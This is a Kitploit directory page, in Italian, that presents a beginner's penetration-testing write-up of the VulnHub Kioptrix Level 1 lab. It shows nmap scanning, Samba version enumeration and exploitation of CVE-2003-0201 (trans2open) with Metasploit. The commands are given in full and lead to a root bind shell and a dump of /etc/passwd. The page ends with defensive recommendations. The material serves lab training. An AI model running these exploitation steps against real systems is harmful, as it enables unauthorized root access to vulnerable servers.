Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pentest-writeups — Write-up di Kioptrix Level 1 - CVE-2003-0201 Samba trans2open | Kitploit
Strumenti/GitHubGitHub/americooo/pentest-writeups
Escalation di PrivilegiRicognizioneAnalisi delle VulnerabilitàExploitPost-ExploitCTFPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubamericooo/pentest-writeups

pentest-writeups

Write-up di Kioptrix Level 1 - CVE-2003-0201 Samba trans2open

1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

pentest-writeups

Kioptrix Level 1 writeup - CVE-2003-0201 Samba trans2open

Kioptrix Level 1 — Writeup di Penetration Testing

Autore: Amirbek Raxmatullayev (@americo_444)
Data: 2026-06-17
Piattaforma: VulnHub
Difficoltà: Principiante
Obiettivo: Ottenere accesso root


1. Configurazione dell'Ambiente

ComponenteDettagli
Sistema Operativo HostUbuntu 26.04
HypervisorQEMU/KVM
TargetKioptrix Level 1 (VMDK)
IP Attaccante192.168.56.1
IP Target192.168.56.101

Nota: VirtualBox era incompatibile con il kernel 7.0.0-22-generic a causa di un conflitto di namespace DKMS KVM. Si è passati a QEMU/KVM e si è caricato il VMDK direttamente senza conversione.

root@kitploit:~
qemu-system-x86_64 \
  -m 512 \
  -drive file="Kioptix Level 1.vmdk",format=vmdk \
  -netdev bridge,id=net0,br=virbr0 \
  -device e1000,netdev=net0 \
  -display gtk

2. Ricognizione

2.1 Scoperta degli Host

root@kitploit:~
nmap -sn 192.168.56.0/24

Risultato: Target identificato su 192.168.56.101

2.2 Scansione Completa di Porte e Servizi

root@kitploit:~
nmap -sV -sC -p- 192.168.56.101

Porte Aperte:

2.3 Enumerazione della Versione SMB

root@kitploit:~
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
  set RHOSTS 192.168.56.101; run; exit"

Risultato: Samba 2.2.1a — versione criticamente vulnerabile confermata.


3. Analisi delle Vulnerabilità

CVE-2003-0201 — Samba trans2open Buffer Overflow

Descrizione:
Le versioni 2.2.x di Samba contengono una vulnerabilità di buffer overflow basato su stack nella funzione trans2open. Ciò consente a un attaccante remoto non autenticato di eseguire codice arbitrario come root.

Versioni Interessate: Samba 2.0.x — 2.2.8
Punteggio CVSS: 10.0 (Critico)
Modulo Exploit: exploit/linux/samba/trans2open


4. Sfruttamento

4.1 Configurazione di Metasploit

root@kitploit:~
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run

Perché bind_tcp invece di reverse_tcp?
Il payload reverse_tcp non ha funzionato perché la VM Kioptrix non poteva raggiungere l'attaccante attraverso la configurazione NAT/bridge. Con bind_tcp, l'attaccante si connette al target — nessuna connessione in uscita richiesta dalla vittima.

4.2 Output dello Sfruttamento

root@kitploit:~
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)

Shell ottenuta! ✅


5. Post-Sfruttamento

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=99(nobody)

hostname
# kioptrix.level1

uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash

Informazioni di Sistema:

  • Sistema Operativo: Red Hat Linux, Kernel 2.4.7 (compilato nel 2001)
  • Utenti locali scoperti: root, john, harold

6. Catena di Attacco

root@kitploit:~
[Attacker: 192.168.56.1]
        |
        | Step 1: nmap full port scan
        v
[Target: 192.168.56.101]
        |
        | Step 2: Samba 2.2.1a identified
        v
[Metasploit — trans2open exploit]
        |
        | Step 3: Stack buffer overflow triggered
        v
[Bind shell opened on port 4444]
        |
        | Step 4: whoami = root
        v
[TARGET PWNED]

7. Punti Chiave

Cosa Ho Imparato:

  • Configurare un ambiente di laboratorio con QEMU/KVM quando VirtualBox non funziona
  • Fingerprinting dei servizi con nmap -sV -sC
  • Enumerazione SMB utilizzando i moduli ausiliari di Metasploit
  • Comprendere i meccanismi del buffer overflow basato su stack di CVE-2003-0201
  • Differenza tra i payload bind_tcp e reverse_tcp e quando usarli

Raccomandazioni Difensive (Blue Team):

  1. Aggiornare Samba alla versione 3.x o successiva
  2. Limitare le porte 139/445 tramite firewall — consentire solo host interni fidati
  3. Applicare tutte le patch disponibili per sistema operativo e servizi
  4. Implementare la segmentazione di rete — SMB non dovrebbe mai essere esposto esternamente
  5. Implementare regole IDS/IPS per rilevare tentativi di buffer overflow su SMB

8. Strumenti Utilizzati

StrumentoScopo
nmapScansione delle porte, rilevamento servizi/versioni
Metasploit FrameworkEnumerazione SMB, sfruttamento
QEMU/KVMVirtualizzazione del laboratorio
arp-scanScoperta degli host

9. Riferimenti

  • CVE-2003-0201 — NVD
  • Rapid7 — trans2open Module
  • VulnHub — Kioptrix Level 1

Scritto da Amirbek Raxmatullayev | BEK Coders Security Research | 2026

Scarica lo strumento
PortaServizioVersione
22/tcpSSHOpenSSH 2.9p2
80/tcpHTTPApache 1.3.20
111/tcpRPCrpcbind 2
139/tcpSMBSamba 2.2.1a
443/tcpHTTPSmod_ssl/2.8.4
32768/tcpStatusRPC #100024